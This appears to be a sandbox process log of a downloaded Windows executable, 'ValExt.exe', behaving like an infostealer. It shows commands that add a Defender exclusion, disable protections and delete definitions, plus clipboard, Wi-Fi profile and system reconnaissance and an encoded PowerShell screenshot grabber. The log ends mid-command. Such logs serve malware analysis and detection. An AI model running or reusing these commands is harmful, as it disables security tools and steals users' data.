"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6280 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7032 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7012 /prefetch:8
C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=517009
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ffaf3dc46f8,0x7ffaf3dc4708,0x7ffaf3dc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4972 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7056 /prefetch:8
C:\Users\Admin\Downloads\ValExt.exe
"C:\Users\Admin\Downloads\ValExt.exe"
C:\Users\Admin\Downloads\ValExt.exe
"C:\Users\Admin\Downloads\ValExt.exe"
C:\Users\Admin\Downloads\ValExt.exe
"C:\Users\Admin\Downloads\ValExt.exe"
C:\Users\Admin\Downloads\ValExt.exe
"C:\Users\Admin\Downloads\ValExt.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ValExt.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ValExt.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Users\Admin\Downloads\ValExt.exe
"C:\Users\Admin\Downloads\ValExt.exe"
C:\Users\Admin\Downloads\ValExt.exe
"C:\Users\Admin\Downloads\ValExt.exe"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoAC